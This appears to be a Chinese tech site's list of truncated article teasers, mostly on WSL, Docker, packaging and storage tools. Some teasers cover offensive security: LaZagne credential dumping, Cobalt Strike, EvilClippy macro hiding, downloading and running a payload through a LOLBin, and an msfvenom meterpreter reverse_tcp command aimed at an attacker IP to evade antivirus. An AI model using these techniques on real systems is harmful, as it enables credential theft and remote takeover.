LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序。 每个软件都使用不同的技术(纯文本、API、自定义算法、数据库等)存储其密码。LaZagne 的作用就是找到最常用的一些软件的密码。 LaZagne 几乎支持市面上大部分常用工具。包括浏览器、Git、SVN、Wifi、Databases 等。但是对聊天软件的支持不够本土化,主要支持一些国外的聊天软件。
通常执行 python 程序要有相应的 Python 环境,但某些特定场景下,我们可能并不愿意这么麻烦的去配置这些环境(比如将写好的脚本发给客户进行操作),如果可以提前将程序打包成 Windows平台的 .exe 文件或者是Linux下的 .sh 脚本,那么使用起来就会方便很多,py2exe 和 PyInstaller 这两款工具都是干这么个事的,下面以 hello.py 脚本(代码内容如下)为例进行介绍。
CrossOver是一款可以让Mac和Linux系统中正常运行Windows软件的应用程序。它不像虚拟机一样需要安装Windows系统之后才可以安装Windows的应用程序,这一方式给大多数用户带来了方便。通过CrossOver实现跨平台的文件复制粘贴,使Mac/Linux系统与Windows应用良好结合。
1. WSL是什么 WSL 是Windows Subsystem for Linux 的简称,主要是为了在Windows 10上原生运行Linux二进制可执行文件(ELF格式),而提供的兼容层。 通俗来讲是在Windows10 嵌入了个Linux子系统(默认是ubuntu),方便运行大部分 Linux 命令及软件,比如grep MySQL Apache。这很大方便了使用Windows做开发的同学,不需要双系统或虚拟机了。 在Windows功能中启用```适用于Linux的Windows子系统```,然
启用虚拟机功能,安装 WSL 2 之前,必须启用“虚拟机平台”可选功能。 使用管理员权限运行cmd.exe或PowerShell,输入如下内容:
1. WSL是什么 2. WSL新特性 3. WSL管理配置 4. WSL交互 5. 解决方案 * 5.1 使用别名 * 5.2 多复制一份 * 5.3 重定向 * 5.4 symlink 6. 其他 * 6.1 闲聊 * 6.2 参考 1. WSL是什么 WSL 是Windows Subsystem for Linux 的简称,主要是为了在Windows 10上原生运行Linux二进制可执行文件(ELF格式),而提供的兼容层。 通俗来讲是在Windows10 嵌入了个Linux
本篇记录下Cobaltstrike上线windows及linux主机shell的基本操作流程。
将Python程序打包成exe(可执行文件)的主要原因是为了便于分发和使用,同时保护代码和提升用户体验。。这个过程有几个关键优点:
最近有个朋友突然问起,想买一台新的个人开发用电脑,偶尔连接公司环境做做远程开发,问我有什么推荐的配置。
WSL是Windows Subsystem for Linux的缩写,允许利用CPU的虚拟化技术在Windows系统下使用Linux系统。目前最新版本是WSL2。
功能类似于JSFinder,开发由来就是使用它的时候经常返回空或链接不全,作者还不更新修bug,那就自己来咯
昨天看到 Laravel 新出来一个工具 Laravel Sail ,简而言之就是 Laravel 自己出的 基于 Docker 的本地开发环境。
续之前讲的在TopShelf上部署ASP.NET Core程序,作为后台服务运行,自从.NET Core 3.0出现以后,出现了自带的Generic Host,使得自托管服务变为可能。
微软发布了一个新的 0.67.6 版本的适用于 Linux 的 Windows 子系统 ,其中包括期待已久的 systemd 支持。在此之前需要使用其它方式来完成,但是多少都会有点问题,可以参考:请参考:https://www.xmmup.com/zaiwsl2zhonganzhuangqitalinuxfaxingban.html
kali作为一个渗透测试者最受欢迎的操作系统,集成了非常多的安全工具,让渗透测试人员更方便的做一些渗透测试工作,本文来自国外某位大神的github,在这里给大家做一个分享,具体内容如下:
本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。
Tips: 单个 Linux 分发版可以在 WSL 1 或 WSL 2 体系结构中运行。 每个分发版可随时升级或降级,并且你可以并行运行 WSL 1 和 WSL 2 分发版。
qdownload qdownload 从七牛空间同步数据到本地,支持只同步某些前缀的文件,支持增量同步 [root@h101 qshell]# cat ccfg { "dest_dir" : "/tmp/x", "bucket" : "qiniucloud-goods", "domain" : "http://video.qiniutest.cn", "access_key" : "ELUs327kxVPJrGCXqWae9yioc0xY
xray是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持 Windows / macOS / Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求
很多用户除此之外,还喜欢Linux命令行~但是CMD的命令和Linux命令行有许多差别!
张天飞老师编写的《RISC-V体系结构编程与实践》,里面的源码是基于 QEMU 模拟器的,可以认为它是一款虚拟的开发板。如果需要在真实开发板上学习,可以使用百问网的 DongshanPI-D1S 开发板。
该文介绍了在Windows上运行Docker Linux容器的预览版本,包括LinuxKit和Docker的集成。Windows Server 2019和Windows 10的Insider用户可以尝试这个预览版本。虽然这是一个早期预览版本,但基本的Docker操作,如pull和run,是可以进行的。用户可以通过在同一个系统上并行运行两个平台的容器来更轻松地构建和测试混合的Windows / Linux Docker应用程序。
微软正在为Windows Server的下一个重大更新做准备(查看微软博客最近补充的这篇文章),并且有些新功能对于Docker用户来说是非常令人兴奋的。其中最重要的增强之处就是Docker现在可以使用Hyper-V技术在Windows上运行Linux容器。
这将执行InvokeWebRequest(PS v.3 +)以下载payload,使用LOLBin执行它
关于LaZagne LaZagne是一款功能强大的密码凭证恢复与取证工具,该项目是一个完全开源的应用程序,可以帮助广大研究人员在一台本地计算机中检索存储的大量密码凭证。计算机中安装的每一款软件,都使用了不同的技术来存储其密码,例如明文、API、自定义算法和数据库等技术。 因此,为了方便广大安全研究人员执行渗透测试或信息安全取证任务,LaZagne便应运而生,该工具可以有效查找最常用软件的存储凭证。 值得一提的是,该项目已经作为一个后渗透利用模块添加进了pupy中,项目的Python代码将会在内存中被解释
在 Win10 中安装 Docker Desktop 后,结果发现这玩意启动报错:
这是由 萌咖 大佬使用 Golang 基于新的API写的一个效率很高的 OneDrive 上传工具 OneDriveUploader ,同时也修复了各种Shell版本遗留下来的小问题,该版本特点就是授权简单,无需依赖,单文件。同样的也可以配合Aria2一起自动上传,这里就再分享下,方便下有需求的人。
XRay是长亭科技洞鉴核心引擎中提取出的社区版漏洞扫描神器,属于一款功能十分强大的国产被动扫描工具,其应用范围涵括,Web通用漏洞扫描、被动代理扫描、社区POC集成……
xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有: 1、检测速度快。发包速度快; 漏洞检测算法高效。 2、支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 3、代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。 4、高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以极大的客制化功能。 5、安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具,内置的所有 payload 和 poc 均为无害化检查。
Edge与GPT4 微软在 2023 年 2 月上旬的一次活动中宣布,它将把 OpenAI 的 ChatGPT 技术集成到其搜索引擎 Bing 中。新的 ChatGPT 驱动的 Bing 现已确认可以
有了Ventoy你就无需反复地格式化U盘,你只需要把 ISO/WIM/IMG/VHD(x)/EFI 等类型的文件拷贝到U盘里面就可以启动了,无需其他操作.
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
发布于 2018-06-14 00:02 更新于 2018-09-01 00:03
今天,我们再来谈谈 Dart 的另外一大优势,那就是静态编译。估计 php 和 python 直接认输, java 和 go 冷眼旁观?
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,
JuiceFS 的 Windows 客户端也是一个独立的二进制程序,下载解压即可直接运行使用。
总结:比较下来:diffmerge和P4merge最好用,kdiff比较专业些,支持自动merge。
Gargamel是一款基于Rust开发的信息安全取证工具,广大研究人员可以使用Gargamel来完成日常的信息取证任务。
官方解释:MinIO 是一个基于Apache License v2.0开源协议的对象存储服务。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等,而一个对象文件可以是任意大小,从几kb到最大5T不等。
大家好,又见面了,我是你们的朋友全栈君。 微信公众号:乌鸦安全 扫取二维码获取更多信息! 📷 1. 环境 攻击机: kali linux 10.211.55.23 受害机: Windows10 360主动防御 Windows7 火绒主动防御 2. 生成exe文件 在kali linux下使用msfvenom生成一个64位的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f ex
在音视频领域接触最多实现的方案通常是通过ffmpeg(PC和sever端居多)或者硬件厂家的的SDK实现特定硬件的编解码功能(机顶盒,电视等嵌入式设备)。这里我们介绍一个在国内不太常用的解决方案----gstreamer媒体库
今天给大家介绍的是一款名叫EvilClippy的开源工具,EvilClippy是一款专用于创建恶意MS Office测试文档的跨平台安全工具,它可以隐藏VBA宏和VBA代码,并且可以对宏代码进行混淆处理以增加宏分析工具的分析难度。当前版本的EvilClippy支持在Linux、macOS和Windows平台上运行,实现了跨平台特性。
有如下图所示测试环境,外网服务器拥有双网卡,既可与公网进行通信,也可以与内网服务器进行通信。
简介 LaZagne project 是一款用于检索大量存储在本地计算机上密码的开源应用程序。每款软件他们保存密码的方法或许不尽相同(明文,API,算法,数据库等等),我开发这款工具的目的是为了寻找计
在之前的文章中,我们介绍了两种内网穿透工具frp和zerotier。frp可参照《利用frp工具实现内网穿透、随时随地访问内网服务》,zerotier可参照《ZeroTier实现内网穿透、异地组网》。
之前我写过的两篇博客《conan入门(十):Windows下Android NDK交叉编译Boost》,.《conan入门(十一):Linux下Android NDK交叉编译Boost》中介绍了在Linux和Windows下NDK交叉编译boost的过程
最近在部署项目,遇到很多因为文件名大小写导致的编译报错问题。于是搜了下相关问题,发现 Windows 10 开始已经可以通过配置,来实现大小写敏感了。
PS:基本了解了adb的一些安装命令,还有夜神模拟机的设置和安装。这就是环境的搭建。其实不复杂对吧。
Go语言的并发是基于 goroutine 的,goroutine 类似于线程,但并非线程。可以将 goroutine 理解为一种虚拟线程。Go 语言运行时会参与调度 goroutine,并将 goroutine 合理地分配到每个 CPU 中,最大限度地使用CPU性能。开启一个goroutine的消耗非常小(大约2KB的内存),你可以轻松创建数百万个goroutine。goroutine`的特点:
领取专属 10元无门槛券
手把手带您无忧上云